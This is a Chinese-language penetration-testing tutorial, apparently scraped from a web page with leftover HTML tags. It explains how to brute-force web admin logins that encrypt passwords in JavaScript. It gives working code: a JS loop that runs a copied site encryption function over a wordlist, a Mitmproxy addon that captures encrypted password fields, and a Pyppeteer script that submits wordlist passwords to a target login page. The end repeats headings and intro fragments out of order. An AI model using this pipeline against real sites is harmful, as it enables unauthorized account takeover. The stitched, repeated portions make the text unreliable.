采集器绕过JS加密爆破技术详解<\/h1>

0x00 前言<\/h2>
在渗透测试过程中，爆破是不可缺少的一环。但在Web后台爆破中常会遇到JS加密的影响，导致爆破困难。本文提供两种解决方案：常规JS加密函数处理方法和创新的采集器方法。<\/p>

0x01 常规解决方案<\/h2>

方法步骤<\/h3>

抓包分析<\/strong>：发现账号密码全部加密传输<\/li>
定位加密函数<\/strong>：在网页源码中搜索加密函数<\/li>
复制加密逻辑<\/strong>：将目标JS加密函数拷贝到本地<\/li>
处理字典<\/strong>：使用Python将密码字典转换为JS数组格式<\/li>
生成密文<\/strong>：在HTML中调用加密函数处理明文字典<\/li>

爆破<\/strong>：使用Burp Suite进行常规爆破<\/li> <\/ol>
示例代码<\/h3>
\/\/ 调用DES加密函数处理密码 <\/span><\/span><\/span><\/span>let<\/span> arr<\/span> =<\/span> ['password1'<\/span>, 'password2'<\/span>, 'admin'<\/span>]; <\/span><\/span>for<\/span>(let<\/span> i<\/span>=<\/span>0<\/span>; i<\/span><<\/span>arr<\/span>.length<\/span>; i<\/span>++<\/span>){ <\/span><\/span> password<\/span> =<\/span> arr<\/span>[i<\/span>]; <\/span><\/span> pwd<\/span> =<\/span> strEnc<\/span>(password<\/span>,'1'<\/span>,'2'<\/span>,'3'<\/span>); \/\/ 调用目标加密函数 <\/span><\/span><\/span><\/span> document.write<\/span>(pwd<\/span> +<\/span> "<br>"<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre>0x02 采集器方法<\/h2> 当遇到JS混淆或难以理解的加密逻辑时，可采用采集器方法：<\/p> 使用Pyppeteer模拟浏览器输入明文密码<\/li> 使用Mitmproxy截取加密后的流量<\/li> 提取加密后的密码形成新字典<\/li> <\/ol> 0x03 Mitmproxy流量截取<\/h2> 实现原理<\/h3> Mitmproxy作为中间人代理，可以截取并修改HTTP\/HTTPS流量。<\/p> 关键代码<\/h3> from<\/span> mitmproxy import<\/span> ctx, flowfilter <\/span><\/span> <\/span><\/span>class<\/span> Recorder<\/span>: <\/span><\/span> def<\/span> request<\/span>(self, flow): <\/span><\/span> re =<\/span> flow.<\/span>request.<\/span>get_text() <\/span><\/span> string =<\/span> re.<\/span>split('&'<\/span>) # 从&分割<\/span> <\/span><\/span> for<\/span> secret in<\/span> string: <\/span><\/span> if<\/span> 'password'<\/span> in<\/span> secret: # 提取password字段<\/span> <\/span><\/span> s =<\/span> secret.<\/span>split('='<\/span>,1<\/span>)[1<\/span>:] # 获取等号后内容<\/span> <\/span><\/span> with<\/span> open("pass.txt"<\/span>, "a"<\/span>) as<\/span> f: <\/span><\/span> f.<\/span>write(s[0<\/span>] +<\/span> "<\/span>\n<\/span>"<\/span>) <\/span><\/span> <\/span><\/span>addons =<\/span> [Recorder()] <\/span><\/span><\/code><\/pre>使用方法<\/h3> mitmweb -s gather.py <\/span><\/span><\/code><\/pre>默认监听8080端口，8081端口为流量历史记录界面。<\/p> 0x04 Pyppeteer模拟输入<\/h2> 实现原理<\/h3> Pyppeteer是Puppeteer的Python实现，可以控制Chromium\/Chrome浏览器。<\/p> 关键代码<\/h3> import<\/span> asyncio <\/span><\/span>from<\/span> pyppeteer import<\/span> launch <\/span><\/span> <\/span><\/span>async<\/span> def<\/span> main<\/span>(): <\/span><\/span> url =<\/span> "https:\/\/target\/login.htm"<\/span> <\/span><\/span> with<\/span> open("pass.txt"<\/span>, "r"<\/span>) as<\/span> f: <\/span><\/span> for<\/span> password in<\/span> f.<\/span>readlines(): <\/span><\/span> browser =<\/span> await<\/span> launch({ <\/span><\/span> 'headless'<\/span>: False<\/span>, <\/span><\/span> 'args'<\/span>: ['--proxy-server=127.0.0.1:8080'<\/span>], <\/span><\/span> "ignoreHTTPSErrors"<\/span>: True<\/span> <\/span><\/span> }) <\/span><\/span> page =<\/span> await<\/span> browser.<\/span>newPage() <\/span><\/span> await<\/span> page.<\/span>goto(url) <\/span><\/span> password =<\/span> password.<\/span>strip() <\/span><\/span> await<\/span> page.<\/span>type("input[id=username]"<\/span>, "test"<\/span>) <\/span><\/span> await<\/span> page.<\/span>type("input[id=password]"<\/span>, password) <\/span><\/span> await<\/span> page.<\/span>type("input[id=code]"<\/span>, "0000"<\/span>) <\/span><\/span> await<\/span> page.<\/span>click('button[type="submit"]'<\/span>) <\/span><\/span> await<\/span> page.<\/span>waitFor(1000<\/span>) <\/span><\/span> await<\/span> page.<\/span>close() <\/span><\/span> await<\/span> browser.<\/span>close() <\/span><\/span> <\/span><\/span>asyncio.<\/span>get_event_loop().<\/span>run_until_complete(main()) <\/span><\/span><\/code><\/pre>注意事项<\/h3> 需要安装Mitmproxy证书才能处理HTTPS流量<\/li> 适当增加等待时间避免页面未加载完成就执行操作<\/li> 建议添加错误处理机制<\/li> <\/ol> 0x05 实验效果<\/h2> 启动Mitmproxy监听<\/li> 运行Pyppeteer脚本模拟登录<\/li> 脚本会自动将加密后的密码保存到文件<\/li> 使用生成的密文字典进行爆破<\/li> <\/ol> 常见问题解决<\/h2> 页面元素定位失败<\/strong>：增加await page.waitFor(1000)<\/code>等待时间<\/li> HTTPS证书错误<\/strong>：安装Mitmproxy证书并添加ignoreHTTPSErrors<\/code>参数<\/li> 网络延迟问题<\/strong>：在循环中添加适当的延迟<\/li> <\/ol> 总结<\/h2> 本文提供了两种绕过JS加密进行爆破的方法：<\/p> 常规方法适用于JS加密逻辑清晰的情况<\/li> 采集器方法适用于JS混淆或复杂加密的情况<\/li> <\/ol> 采集器方法通过模拟浏览器行为+流量截取的组合，有效解决了复杂JS加密的爆破难题，具有通用性强、适应性好的特点。<\/p>

采集器绕过JS加密爆破技术详解<\/h1>

0x00 前言<\/h2> 在渗透测试过程中，爆破是不可缺少的一环。但在Web后台爆破中常会遇到JS加密的影响，导致爆破困难。本文提供两种解决方案：常规JS加密函数处理方法和创新的采集器方法。<\/p>

0x01 常规解决方案<\/h2>

0x03 Mitmproxy流量截取<\/h2>

实现原理<\/h3> Mitmproxy作为中间人代理，可以截取并修改HTTP\/HTTPS流量。<\/p>

0x04 Pyppeteer模拟输入<\/h2>

实现原理<\/h3> Pyppeteer是Puppeteer的Python实现，可以控制Chromium\/Chrome浏览器。<\/p>

0x00 前言<\/h2>
在渗透测试过程中，爆破是不可缺少的一环。但在Web后台爆破中常会遇到JS加密的影响，导致爆破困难。本文提供两种解决方案：常规JS加密函数处理方法和创新的采集器方法。<\/p>

实现原理<\/h3>
Mitmproxy作为中间人代理，可以截取并修改HTTP\/HTTPS流量。<\/p>

实现原理<\/h3>
Pyppeteer是Puppeteer的Python实现，可以控制Chromium\/Chrome浏览器。<\/p>